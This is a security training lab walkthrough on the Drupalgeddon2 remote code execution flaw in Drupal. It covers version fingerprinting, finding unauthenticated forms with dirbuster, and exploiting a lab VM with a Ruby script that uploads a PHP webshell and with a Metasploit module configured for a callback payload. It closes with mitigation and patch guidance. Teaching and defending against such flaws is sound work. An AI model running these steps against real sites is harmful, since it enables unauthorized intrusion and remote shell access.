CVE-2018-7600 (Drupalgeddon2)

What is it?:

A remote code execution vulnerability exists within multiple subsystems of Drupal before versions 7.58, 8.3.9, 8.4.6, and 8.5.1 with default or common module configurations. The flaw exposes multiple attack vectors on a Drupal site, and an attacker who exploits it can compromise the site.

Identification:

A quick note about the VM before starting the lesson: the Drupal web server running on the VM is available on port 8080.

When identifying whether or not a site is vulnerable to this CVE, there are two factors attackers need to take into consideration. The first factor is the version of Drupal the server is running. The second factor is whether or not the web page has the proper attack surface. How does one determine what version of Drupal is running, and what exactly is the appropriate attack surface?

There are a few different ways of identifying the version of the web page. If an attacker wanted to identify the version without using any tools, they could do so by viewing the web page's source code or documents stored on the web server. To view the source code, press CTRL+u; on most browsers this displays the code in a new tab. In the source code, find the line that starts with <meta name="Generator" to identify the Drupal version. See image 1.1 for an example of the source code and this line.

[Image 1.1: page source showing the meta Generator line]

As you can see in image 1.1, we discovered this server is running version 8 of Drupal. Another way of identifying this information without tools is by browsing to the page /core/changelog. That page lets us validate our findings from the source code. Image 1.2 is an example of the information present on this page.

[Image 1.2: the /core/changelog page]

If you want to utilize a tool for identifying what version of Drupal is running, a combination of printf and nc can be used to extract the needed information from the HTTP response headers. This can be done with the command printf "HEAD / HTTP/1.0\r\n\r\n" | nc -n -i 1 172.17.0.3 80. See image 1.3 for an example of this command being run and the response line identifying what version of Drupal is running.

[Image 1.3: HEAD request sent with printf and nc, with the version line in the response]
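The three version sources above (the X-Generator response header, the meta Generator tag, and the changelog page) can be checked programmatically and compared against the fixed releases listed in the Mitigation section. The following Python is an added example, not part of the original lesson or the lab files; it parses constructed sample responses rather than contacting a server, and its branch-handling rule for 8.x releases without a listed fix is an assumption.

```python
import re

# First patched release of each branch, as listed in the Mitigation section.
FIXED = {(7,): (7, 58), (8, 3): (8, 3, 9), (8, 4): (8, 4, 6), (8, 5): (8, 5, 1)}

def parse_version(text):
    """Return the first 'Drupal X[.Y[.Z]]' in text as a tuple of ints, or None."""
    m = re.search(r"Drupal\s+(\d+(?:\.\d+){0,2})", text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def fingerprint(http_response):
    """Collect version hints from a raw HTTP response: X-Generator header, meta tag, changelog line."""
    patterns = {
        "x-generator": r"^X-Generator:\s*(.+)$",
        "meta": r'<meta\s+name="Generator"\s+content="([^"]+)"',
        "changelog": r"^(Drupal\s+\d+\.\d+\.\d+),",
    }
    hints = {}
    for name, pat in patterns.items():
        m = re.search(pat, http_response, re.I | re.M)
        if m:
            hints[name] = parse_version(m.group(1))
    return hints

def best_guess(hints):
    """Prefer the most specific hint (major.minor.patch over a bare major)."""
    return max(hints.values(), key=len, default=None)

def assess(version):
    """Classify a version tuple as 'patched', 'vulnerable' or 'unknown'. A bare major
    ("Drupal 8") cannot be judged, which is why the lesson cross-checks /core/changelog."""
    if version is None or version[0] not in (7, 8):
        return "unknown"
    if version[0] == 7:
        if len(version) < 2:
            return "unknown"
        return "patched" if version >= FIXED[(7,)] else "vulnerable"
    if len(version) < 3:
        return "unknown"
    # Assumption: 8.x branches without a listed fix (8.0-8.2, 8.6+) are judged against 8.5.1.
    fixed = FIXED.get(version[:2], FIXED[(8, 5)])
    return "patched" if version >= fixed else "vulnerable"

# Constructed sample responses (not captured from any real server).
SAMPLE_FRONT_PAGE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
    "X-Generator: Drupal 8 (https://www.drupal.org)\r\n\r\n"
    '<html><head><meta name="Generator" content="Drupal 8 (https://www.drupal.org)" />'
    "</head><body></body></html>"
)
SAMPLE_CHANGELOG = "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nDrupal 8.5.0, 2018-03-07\n-----\n"
```

Run `assess(best_guess(fingerprint(resp)))` on each response: the front page only yields "Drupal 8" and is reported as unknown, while the changelog line gives 8.5.0 and is reported as vulnerable.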

Now that we have identified that a version of Drupal 8 is running, the next step is to find the proper attack surface. But what is the appropriate attack surface? For this CVE, the right attack surface is an unauthenticated form. Forms such as login and register forms, or a password reset form, would be considered unauthenticated. To identify these forms, we can either browse the page manually or utilize a tool such as dirb. If we manually browse this web site, we can stumble across the register new user form by clicking "login" at the upper right-hand corner and then selecting the "Create new account" tab on the login page. See image 1.4 for an example of this page.

[Image 1.4: the "Create new account" registration form]

If you want to use an automated tool to find a registration form or password reset form, dirbuster would be a fantastic option. Dirbuster is easy to use and is installed on Kali by default; to launch it, type dirbuster in the terminal. Once it has launched, type your desired target into the "Target URL" field and select a wordlist you want the tool to use. If you are using Kali, you can find your wordlists in the "/usr/share/wordlists/" directory. After you have selected your wordlist, click the start button on the bottom right-hand corner. See image 1.5 for an example of this tool's setup step.

[Image 1.5: dirbuster setup with target URL and wordlist selected]

Now that we have launched the tool, dirbuster will iterate through the wordlist, trying to identify directories and pages based on the server responses. While running dirbuster we were able to identify a user login page and a user registration page. Once these pages were found, we stopped dirbuster. If we had let the tool proceed, it would have found additional assets. Image 1.6 shows a 200 response from the web server, which indicates that the requested page or directory is present.

[Image 1.6: dirbuster results showing 200 responses for the login and registration pages]

Since we have identified what version is running and an appropriate attack surface, we will move on to the next step, and what step is that? That's right; it's EXPLOITATION TIME!

Exploitation:

For the exploitation phase, we are going to use two different tools. The first is a ruby script found on github, which can be found in the lab files. The second tool we will be covering is a Metasploit module.

When researching a CVE, you can use github to find scripts to exploit or identify your CVE. Since we could manually identify the CVE, we did not use github to find a script to scan for Drupalgeddon2. We did, however, search for a script we could use for exploitation. Usage for this script is straightforward; the command would be ruby drupalgeddon2.rb <target>. For example, our usage is ruby drupalgeddon2.rb 192.168.1.49:8080. We add 8080 at the end of our IP because, for the lab VM, the drupal server is running on port 8080. As you can see in image 1.7, this tool steps through the identification phases, and once it has confirmed the target is vulnerable, it will upload a PHP webshell. After the shell is uploaded, the attacker is presented with an interactive terminal.

[Image 1.7: the ruby script running its identification checks and uploading the webshell]

The ruby script we provided gives users limited capabilities with its PHP webshell. Maybe you want a tool that gives you more options. For that, we turn to Metasploit and its many modules and post-exploitation capabilities. To use the exploitation module, we first need to know its path so we can select it as the active module. Finding this information can be done by running the search command with the term Drupalgeddon2. Image 1.8 shows an example of the search command being run and its results. Metasploit has informed us that we can use one module, which is exploit/unix/webapp/drupal_drupalgeddon2.

[Image 1.8: Metasploit search results for Drupalgeddon2 and the module being selected]

After identifying which module we want to use, we need to set it as the active module and set any additional options. To make our module active, we use the command "use exploit/unix/webapp/drupal_drupalgeddon2", which tells Metasploit this is the module we wish to use. As you can see in image 1.8, after running this command our console prompt displays "exploit(unix/webapp/drupal_drupalgeddon2)" to inform us the module is active.

Next, we run the "show options" command to identify any options that need to be set. Running the "show options" command for this module tells us we need to set the "RHOSTS" option. Additionally, we will change the "RPORT" option since the webserver is running on port 8080. To do this, run the command "set rhosts Target" and replace the word Target with your target's IP or URL information. Next, run the command "set rport 8080". Lastly, we will set our "LHOST" to define what IP we want a payload to use for its call back. The command we will use for setting our "LHOST" option is "setg lhost 192.168.1.53". Using the "setg" command defines a global variable and lets Metasploit choose a payload for you. You can manually select a payload, but for this lesson we will let Metasploit pick the best one for us. Once this is complete, you can run your module by typing the command "run" in the console and pressing enter. See image 1.9 for an example of setting the "RHOSTS", "RPORT", and "LHOST" options and running the module.

[Image 1.9: setting RHOSTS, RPORT and LHOST and running the module]

Congratulations, you've exploited this lab. Now that you know the basics of identifying and exploiting this vulnerability, get out there and hack the planet!

Mitigation:

  • If you are running Drupal 7 before version 7.58, upgrade to Drupal 7.58 or apply this patch https://git.drupalcode.org/project/drupal/commit/2266d2a83db50e2f97682d9a0fb8a18e2722cba5.

  • If you are running Drupal 8.3.x before version 8.3.9, upgrade to Drupal 8.3.9 or apply this patch https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f.

  • If you are running Drupal 8.4.x before version 8.4.6, upgrade to Drupal 8.4.6 or apply this patch https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f.

  • If you are running Drupal 8.5.x before version 8.5.1, upgrade to Drupal 8.5.1 or apply this patch https://git.drupalcode.org/project/drupal/commit/5ac8738fa69df34a0635f0907d661b509ff9a28f.